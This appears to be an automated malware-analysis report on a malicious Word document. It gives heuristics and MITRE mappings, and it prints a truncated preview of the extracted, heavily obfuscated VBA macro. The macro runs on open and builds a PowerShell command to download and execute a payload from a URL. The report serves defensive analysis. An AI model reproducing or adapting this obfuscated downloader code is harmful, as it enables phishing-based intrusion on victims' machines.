MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly indicative of malicious intent. The script attempts to construct and execute a PowerShell command to download and execute a payload from the URL 'http://7KnMct8tT6uAZ7el'. This suggests a downloader or droppper functionality.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://7KnMct8tT6uAZ7el In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 132538 bytes |
SHA-256: b7e68ca7e0fb05bca35e4c1c186de7361f494c3391b85dfe0635befebece0c0c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VUzSrsNCHPl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function XwQBkLB()
On Error Resume Next
kmHzHavq = (cofOzZDzBo - CDbl(838864) + VEaEsVmjqG + Fix(AzdZfb / CLng(962874 * Sqr(jXDpk))) - 988518 / Sin(WkijOC - ovVBjM - 605079 + CLng(FlnMz)) * 439263 * Fix(838864))
ACAGNj = "sUef7s4taw21FWhckowershell iR3"
BzBzp = CStr(Left(Right(ACAGNj, 13), 10))
XPqHhHfl = "sUef7s4taw21FWhckHwM9vhWUDciR3kcyKt . ( ([StrInG]$veRBOwn8At"
huOufzB = Left(Right(XPqHhHfl, 25), 20)
waGhQJLY = "sUef7s4taw21FWhckSePrEFereniR3"
KFrzw = CStr(Left(Right(waGhQJLY, 13), 10))
WmuRqn = "kxICy3nFCe)[1,3]V2xDBE5s"
HdkFlHsGK = CStr(Left(Right(WmuRqn, 16), 8))
KztumjtYn = Chr(43)
kkfIpAzErS = "ICy3nFjZGuruoVV2xDBE5'X'-jOiN'')(((' iNlE30wXCGc8pEiNvrQQ"
PsPCnUtFi = Left(Right(kkfIpAzErS, 36), 18) + Left(Right(kkfIpAzErS, 4), 1)
bLSKMPO = (hRRNmY - CDbl(996143) + YwAQuPWz + Fix(FHnIfS / CLng(555884 * Sqr(OmqGZo))) - 996442 / Sin(nNlJf - vUpDLLlfq - 460025 + CLng(AFNFEF)) * 254443 * Fix(996143))
LlVIYb = "ICy3nFjZGuruoVV2xDBEokE-eXpReSsioN ((7elE30wXCGc8p(iNW"
TIRsJMzjiI = CStr(Left(Right(LlVIYb, 34), 17)) + Left(Right(LlVIYb, 4), 1)
mrvoSCF = "kxICy3nF7KnOS7KnV2xDBE5s"
CXMzfzW = CStr(Left(Right(mrvoSCF, 16), 8))
CdFvrsTRS = Chr(43)
ZQtqtBP = "kxICy3n7Knl7KnoVV2xDB"
qFXUBEPww = Left(Right(ZQtqtBP, 14), 7)
CijMREmwjb = Chr(43)
kFhLRtKDDk = "kxICy3nFjZGuru7Knnsadasd7Kn9TMct8tT6uAZ"
jwXSHONZ = Left(Right(kFhLRtKDDk, 25), 13)
quiFoDshWHk = Chr(43)
tPhzAtpqqn = "kx7'y3"
BkiXztdmF = CStr(Left(Right(tPhzAtpqqn, 4), 2))
iqBJHAB = Chr(43)
vJVjmtVLnDf = (sfcRhJEoWYW - CDbl(472191) + PaAsHzF + Fix(sGGjUSlCZ / CLng(936445 * Sqr(LXsSTZzJJna))) - 914215 / Sin(XXnzULtd - owACl - 157332 + CLng(tzPXBOZM)) * 992549 * Fix(472191))
iSBTXS = "kxICy3nFjZGu'Kn = &(7Knsmxt9TMct8"
zPUEzPhpB = CStr(Left(Right(iSBTXS, 21), 11))
RUMcDOu = Chr(43)
MkqBl = "kxICy3n7KnA7KnoVV2xDB"
HlpinVD = Left(Right(MkqBl, 14), 7)
rrkZRTlu = Chr(43)
BiOzVUkj = "kxICy3nFjZGu7KnosnAo7Knsmxt9TMct8"
MwMqMKm = CStr(Left(Right(BiOzVUkj, 21), 11))
pdzYPwjWJth = Chr(43)
stIZFw = "kxICy3n7Kns7KnoVV2xDB"
UcwAWYpEbww = Left(Right(stIZFw, 14), 7)
RIrRiiuaC = Chr(43)
Sdwrrf = "kxI7KnnFj"
zsGCbuECI = CStr(Left(Right(Sdwrrf, 6), 3))
EzwkzLTo = Chr(43)
wvzYqZd = (JHUWLGF - CDbl(820142) + GHNswUp + Fix(OdazHJFrRz / CLng(597982 * Sqr(ZizAFkozzu))) - 279597 / Sin(TsBXiXt - XbFJK - 118178 + CLng(wfKABc)) * 135228 * Fix(820142))
KYIYj = "kxICy3nFAoseAos'V2xDBE5s"
mFApkKhZ = CStr(Left(Right(KYIYj, 16), 8))
TsLjX = Chr(43)
TnMcnZuw = "k'I"
bpVbici = Left(Right(TnMcnZuw, 2), 1)
fwjcLizZVF = Chr(43)
HfZbj = "k'I"
tEXULaKKbzp = Left(Right(HfZbj, 2), 1)
Tptzjjq = Chr(43)
ATRGop = (QnRfPsiRC - CDbl(361460) + lCdKsoPYFS + Fix(kLjvNX / CLng(407725 * Sqr(UiwifJkuDP))) - 825374 / Sin(BsnfoYAszH - BiiXVfbij - 21105 + CLng(VozYs)) * 651364 * Fix(361460))
trSwaJmiOV = "kxICy'A7KnGuruo"
EDtvTrTJfc = CStr(Left(Right(trSwaJmiOV, 10), 5))
kQUVj = Chr(43)
XcjjTp = "kxICy3n7Kno7K'oVV2xDB"
UpDLFGP = Left(Right(XcjjTp, 14), 7)
HGBRGO = Chr(43)
UJkYfMrkAMY = "kx'ny3"
TtRfFltiul = CStr(Left(Right(UJkYfMrkAMY, 4), 2))
LnhEGaFF = Chr(43)
Tiptdsd = "kxICy3nFjZGuruoV7Knsw-objecA7Knt8tT6uAZ7elE30"
wGbwzdiLk = CStr(Left(Right(Tiptdsd, 29), 15))
rYNKQWD = Chr(43)
ZDkmOXazFmu = "kxICy7KnosGuruo"
ifaKIZducf = CStr(Left(Right(ZDkmOXazFmu, 10), 5))
XwQBkLB = BzBzp + huOufzB + KFrzw + HdkFlHsGK + KztumjtYn + PsPCnUtFi + TIRsJMzjiI + CXMzfzW + CdFvrsTRS + qFXUBEPww + CijMREmwjb + jwXSHONZ + quiFoDshWHk + BkiXztdmF + iqBJHAB + zPUEzPhpB + RUMcDOu + HlpinVD + rrkZRTlu + MwMqMKm + pdzYPwjWJth + UcwAWYpEbww + RIrRiiuaC + zsGCbuECI + EzwkzLTo + mFApkKhZ + TsLjX + bpVbici + fwjcLizZVF + tEXULaKKbzp + Tptzjjq + EDtvTrTJfc + kQUVj + UpDLFGP + HGBRGO + TtRfFltiul + LnhEGaFF + wGbwzdiLk + rYNKQWD + ifaKIZducf
End Function
Functi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.